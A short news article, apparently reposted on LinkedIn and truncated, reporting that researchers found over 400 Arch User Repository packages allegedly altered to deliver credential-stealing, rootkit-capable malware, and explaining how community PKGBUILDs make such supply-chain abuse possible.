400+ Arch Linux Packages Hijacked To Install Rootkit-Like Malware

Source Domain: www.linkedin.com

Security researchers have uncovered one of the largest malicious package campaigns to impact the Arch Linux ecosystem in recent years, with more than 400 software packages hosted in the Arch User Repository (AUR) allegedly modified to distribute a sophisticated credential-stealing malware platform capable of deploying kernel-level rootkit functionality.

The incident has reignited concerns over software supply-chain security within open-source ecosystems, highlighting how trusted community repositories can be weaponized by attackers seeking access to developer workstations, cloud infrastructure credentials, and enterprise environments.

Researchers from the Independent Federated Intelligence Network (IFIN), independent analysts, and software supply-chain security firm Sonatype have collectively documented a campaign in which threat actors abused package maintenance mechanisms within Arch Linux’s community-driven repository infrastructure to distribute malware disguised as legitimate software updates.

The discovery affects hundreds of packages hosted on the Arch User Repository, a widely used software distribution platform that extends the capabilities of the Arch Linux operating system beyond its official repositories.

Trusted Repository Becomes Attack Vector

Unlike officially maintained repositories, the Arch User Repository operates as a community-managed platform where users can contribute package build instructions known as PKGBUILDs. These scripts automate the downloading, compilation, and installation of software that may not be available through Arch Linux’s official channels.

…

Source